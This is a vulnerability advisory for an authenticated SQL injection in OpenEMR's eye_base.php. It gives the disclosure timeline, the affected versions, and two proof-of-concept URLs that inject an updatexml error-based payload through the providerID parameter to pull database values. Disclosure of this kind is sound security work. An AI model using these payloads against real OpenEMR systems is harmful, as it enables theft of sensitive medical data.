Authenticated SQL Injection in interface/forms/eye_mag/js/eye_base.php
in OpenEMR before 5.0.2.1 allows a user to extract arbitrary data from
the openemr database via a non-parameterized INSERT INTO statement,
as demonstrated by the providerID parameter.
- Discovered: September 16, 2019
- Pull Request Issued: September 16, 2019
- Reported: September 16, 2019
- OpenEMR merged pull Request: September 17, 2019
- CVE ID issued: September 17, 2019
- OpenEMR Release: October 10, 2019 (5.0.2.1)
Fixed-In Version: 5.0.2.1
Affected Versions:
- 5.0.1
- 5.0.1.1
- 5.0.1.2
- 5.0.1.3
- 5.0.1.4
- 5.0.1.5
- 5.0.1.6
- 5.0.1.7
- 5.0.2
Will Porter, Lodestone Security (https://www.lodestonesecurity.com/)
If the OpenEMR instance was running on localhost port 80, the following URL could be used to exploit the vulnerability, executing the payload "version()".
http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=1%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271
Note that this would require there to be no existing providerID 1 present in the database. After retrieving the cell of data, the next cell retrieved would have to use a new provider id, since this also has the affect of adding data with the provderID. So the next request would have to use:
http://localhost/openemr/interface/forms/eye_mag/js/eye_base.php?providerID=2%27,%274%27,%27title%27,%27notes%27,%275%27,%276%27%20and%20updatexml(0,concat(0x7e,%20(version())),0)),(%271
and so on and so forth.